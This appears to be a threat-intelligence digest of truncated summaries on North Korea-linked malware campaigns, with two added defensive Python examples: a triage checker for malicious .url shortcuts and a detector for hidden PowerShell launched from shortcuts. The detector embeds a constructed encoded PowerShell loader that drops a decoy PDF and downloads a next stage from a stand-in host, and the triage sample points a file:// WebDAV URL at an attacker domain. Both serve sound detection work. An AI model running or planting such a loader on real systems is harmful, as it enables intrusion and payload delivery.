Paolo Caversaccio analyzed `1inch-analysis.app`, a malicious macOS bundle sent to 1inch cofounder Anton Bukov by the fake security researcher persona Nick L. Franklin. The source attributes the incident with high confidence to the AppleJeus/Citrine Sleet/…
778 reports
Meet Nick Franklin: Nick L. Franklin - Blockchain Security Engineer or RGB operative hacking for DPRK
The archived investigation examines the Nick L. Franklin persona, alleging that a blockchain security identity may have been used for DPRK-linked social engineering against cryptocurrency researchers and projects. The source cites a suspicious file sent t…
ESTsecurity warns that RokRAT malware is being distributed through a malicious LNK file disguised as an academic paper under submission in the defense field. When executed, the shortcut runs embedded PowerShell code, drops a decoy PDF alongside toy01.dat,…
ESET profiles RansomHub as the dominant ransomware-as-a-service group that rose after law-enforcement disruption of LockBit and BlackCat. The research links RansomHub activity to tooling trails associated with Play, Medusa, and BianLian affiliates and doc…
K7 Labs analyzes a Kimsuky attack chain built from a ZIP archive containing a VBScript, a PowerShell script, and two encoded text files. The VBScript dynamically builds and runs a command that launches 1.ps1, which decodes 1.log, collects the BIOS serial …
JPCERT/CC argues that Lazarus should be treated as a collection of overlapping subgroups rather than a single actor label, because shared tooling, infrastructure, and social-engineering tradecraft now blur campaign and group boundaries. The article explai…
A Kimsuky-themed analysis examines a copyright-related lure delivered as a Windows .url shortcut file named to look like copyright documentation. The shortcut uses an Edge browser icon and a crafted file:// URL referencing invoice-docs-file[.]site and rea…
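Triage logic for the .url lure described in the entry above, as an added example that is not code from that analysis or any other report indexed here. A Windows Internet Shortcut is an INI-style text file whose `[InternetShortcut]` section carries the `URL=` line Explorer opens; a `file://` URL with a host component is a UNC path that Windows resolves over SMB or, with the `DavWWWRoot` hint, WebDAV. The sample below is constructed: the host name is the one the summary gives (written here without the defanging brackets so it parses), while the share path, the `.lnk` target and the Edge icon path are assumptions.

```python
"""Triage of Windows Internet Shortcut (.url) lures (added example, not
code from the analysis it illustrates)."""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed .url content modelled on the lure described above. The host
# comes from the summary; the path, target file name and icon are assumed.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://invoice-docs-file.site/DavWWWRoot/copyright/notice.lnk
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=0
"""

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
"""

# Extensions that Explorer will execute rather than display when the
# remote target is opened.
EXECUTABLE_TARGETS = (".lnk", ".exe", ".hta", ".js", ".vbs", ".cmd", ".bat")


def parse_url_file(text):
    """Return the key/value pairs of the [InternetShortcut] section.

    Keys are lower-cased (Windows treats them case-insensitively); values
    are kept verbatim so the raw URL survives for reporting.
    """
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def triage_url_file(text):
    """Flag .url files whose URL points at a remote UNC/WebDAV target."""
    fields = parse_url_file(text)
    verdict = Verdict(False)
    url = fields.get("url", "")
    parts = urlsplit(url)

    if parts.scheme == "file" and parts.netloc:
        # file:///C:/... has an empty netloc and is a local path; a host
        # component means \\host\share, i.e. SMB or WebDAV to the attacker.
        verdict.reasons.append(f"file:// URL targets remote host {parts.hostname}")
    if parts.path.lower().endswith(EXECUTABLE_TARGETS):
        verdict.reasons.append(f"remote target is executable: {parts.path}")
    icon = fields.get("iconfile", "").lower()
    if parts.scheme == "file" and icon.endswith(("msedge.exe", "chrome.exe", "iexplore.exe")):
        # A browser icon on a file:// shortcut is the disguise the lure uses.
        verdict.reasons.append("browser icon on a non-browser file:// target")

    verdict.suspicious = bool(verdict.reasons)
    return verdict


if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, triage_url_file(sample))
```

The parser deliberately avoids `configparser`, whose interpolation and duplicate-key handling differ from what Explorer tolerates; the three checks are independent so a shortcut that only hits one of them still surfaces with the reason attached.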
SEAL tracks ELUSIVE COMET as an active threat to cryptocurrency users, using carefully built personas and entities such as Aureon Capital, Aureon Press, and The OnChain Podcast to appear legitimate. The actor initiates contact through Twitter DMs or email…
KRCERT issued a vulnerability advisory for Korean security and keyboard-protection products AnySign4PC, TouchEn nxKey, and CrossEX. The advisory says AnySign4PC can expose internal information through a vulnerability, TouchEn nxKey is affected by buffer-o…
Zoth lost about $8.4 million after an attacker used compromised admin privileges to upgrade the USD0PPSubVaultUpgradeable proxy contract and drain funds. The attack withdrew 8.85 million USD0++ tokens, converted them to DAI, and transferred the proceeds a…
BCA LTD describes a North Korean corporate-espionage campaign and a newly named malware family, Chaotic Capybara. The Spanish-language report places the activity within the broader Lazarus Group ecosystem and discusses Chollima-labeled DPRK clusters such …
Chollima Group found an exposed Google Drive folder tied to a North Korean IT worker that contained identity documents, resumes, payment records, notes and IP Messenger chat logs from late 2022 to early 2023. The logs show roughly 500 direct messages acro…
APT37 activity is described in which malicious LNK files disguised as Microsoft Store update content trigger the infection. When executed, the LNK drops a decoy document and batch file, changes the shortcut into an HTML file, and uses obfuscated code to retri…
The malware uses a custom protocol designed to mimic HTTPS traffic, adding another layer of stealth. Organizations should also educate users on social engineering tactics and implement strict security policies to prevent such malware infections. Once inst…
DNSC reports an active phishing campaign that it assesses is very likely linked to Konni, a North Korea-associated group often discussed alongside APT37 and Kimsuky. The infection chain uses malicious Windows LNK email attachments that run hidden PowerShe…
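The RokRAT (ESTsecurity), Kimsuky (K7 Labs), APT37 and Konni (DNSC) entries above share one launch pattern: a shortcut the user double-clicks runs hidden PowerShell that writes a decoy document and fetches or decodes the next stage. The following detection logic over process-creation events is an added example, not code from any of those reports. The events are constructed in a Sysmon Event ID 1 style and are not real telemetry; the `toy01.dat` stage name comes from the ESTsecurity summary, while the download host, decoy file name and the benign comparison events are assumptions.

```python
"""Detect shortcut-launched hidden PowerShell in process-creation events
(added example; constructed events, not real telemetry)."""
import base64
import re

# Switches a shortcut-delivered one-liner carries so the victim sees no
# console window and no execution-policy prompt.
STEALTH_FLAGS = {
    "hidden window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden"),
    "no profile": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "policy bypass": re.compile(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass"),
    "non-interactive": re.compile(r"(?i)(?:^|\s)-noni(?:nteractive)?\b"),
}
# -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script.
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Script-body indicators for the decoy-plus-payload pattern in the summaries.
SCRIPT_INDICATORS = {
    "remote fetch": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    "in-memory execution": re.compile(r"(?i)invoke-expression|\biex\b"),
    "decoy document": re.compile(r"(?i)\.(?:pdf|docx?|hwpx?)\b"),
    "file write": re.compile(r"(?i)set-content|out-file|writeallbytes|copy-item"),
    "next stage": re.compile(r"(?i)start-process|\.(?:dat|log|vbs)\b"),
}


def encode_ps(script):
    """Base64 of UTF-16LE, the encoding powershell -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed one-liner: drop a decoy PDF, open it, fetch the next stage.
# The host is assumed; toy01.dat is the stage name from the RokRAT summary.
MAL_SCRIPT = (
    '$d=$env:TEMP;'
    '[IO.File]::WriteAllBytes("$d\\paper.pdf",[Convert]::FromBase64String($pdf));'
    'Start-Process "$d\\paper.pdf";'
    '$c=New-Object Net.WebClient;'
    '$c.DownloadFile("http://update-store.example/toy01.dat","$d\\toy01.dat")'
)

EVENTS = [
    # Shortcut double-click: explorer.exe launches hidden, encoded PowerShell.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_ps(MAL_SCRIPT)},
    # Admin at a terminal: no-profile, but an ordinary query.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    # Scheduled task with a policy bypass but no payload behaviour.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return "<undecodable -EncodedCommand>"


def analyze_event(ev):
    """Collect launch-context and script-behaviour findings for one event."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    findings = []
    if image not in {"powershell.exe", "pwsh.exe"}:
        return findings
    if parent == "explorer.exe":
        findings.append("powershell spawned directly by explorer.exe (shortcut double-click)")
    for name, rx in STEALTH_FLAGS.items():
        if rx.search(cmd):
            findings.append(f"stealth flag: {name}")
    script = decode_encoded_command(cmd)
    body = cmd if script is None else script
    if script is not None:
        findings.append("encoded command decoded")
    for name, rx in SCRIPT_INDICATORS.items():
        if rx.search(body):
            findings.append(f"script indicator: {name}")
    return findings


def is_alert(findings):
    """Alert only when a suspicious launch context meets payload-like behaviour."""
    context = any(f.startswith(("powershell spawned", "stealth flag")) for f in findings)
    behaviour = any(f.startswith("script indicator") for f in findings)
    return context and behaviour


if __name__ == "__main__":
    for ev in EVENTS:
        f = analyze_event(ev)
        print("ALERT" if is_alert(f) else "ok   ", ev["ParentImage"], f)
```

Requiring both halves (launch context and decoded behaviour) is what keeps the admin and scheduled-task events quiet: each trips a stealth flag on its own, and a rule keyed on flags alone would page on every `-ExecutionPolicy Bypass` in the estate. Matching on the decoded script rather than the raw command line is the part most cheap rules miss, since the base64 hides every keyword.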